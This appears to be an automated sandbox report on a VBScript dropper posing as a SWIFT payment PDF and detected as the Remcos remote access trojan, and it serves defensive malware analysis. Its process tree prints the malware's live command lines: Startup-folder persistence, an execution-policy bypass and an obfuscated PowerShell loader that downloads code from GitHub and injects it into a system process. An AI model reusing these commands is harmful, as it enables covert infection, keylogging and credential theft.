Windows Analysis Report
SWIFT 103 202406111301435660 110624-pdf.vbs

Overview

General Information

Sample name: SWIFT 103 202406111301435660 110624-pdf.vbs
Analysis ID: 1525550
MD5: b4ed8d97bb9132e15502eb005580d3e1
SHA1: eb64b5bfbb04979d46b7f906394caadbe96e5c4f
SHA256: df610fe1800c5c643599d46f147e0e0623b5523e54e3b0795f2e4e2be88ba952
Tags: vbs, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Remcos RAT
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3032 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 5996 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 320 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • powershell.exe (PID: 1076 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64 payload omitted]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 1988 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
          • svchost.exe (PID: 6516 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 3032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 7768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2020,i,18065770690636922477,5919200967098741641,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7900 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 7580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1180,i,15662417021116800271,17959301878097503911,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 1684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1968,i,15358586014354363738,1738356423128360891,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8208 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 8272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 8660 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2000,i,16637610320917934916,565223346788031028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 9080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1184,i,1130476888448619373,4472464422477594584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7828 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 7492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 2300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,2937470017902191409,5218832269953484114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8072 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8944 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,16121129215091139583,4677272960365539008,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8596 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 8572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 5404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7988 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,16982306025501434778,10627650727957162702,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 5884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2008,i,18146508179752881524,919200875560916846,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 5384 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 8936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 9080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,15823624400460166783,6536935139452576376,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1964,i,5440842566350035257,10787203092068946937,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8888 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 8904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 7504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 3608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2032,i,11553977204438472227,7445186355205850417,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 3808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1988,i,7374315475741238408,2210743874770523791,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7092 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 8584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,3916554340437548015,1500443498568681016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 7032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2016,i,9777007145685273446,11700763769562909530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8296 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 3236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 8080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,9602569947055018222,14101658706447688223,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 4024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1492,i,7162340336741099282,8203552688004924699,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7064 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 3424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2012,i,3848042767598446159,15832118433102009625,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2028,i,15924250175209133703,8349155567450697044,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8824 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 8760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 3236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=1980,i,7225582587041739135,14714490613506234970,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,8574600569835257597,12503451850514221727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 5672 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
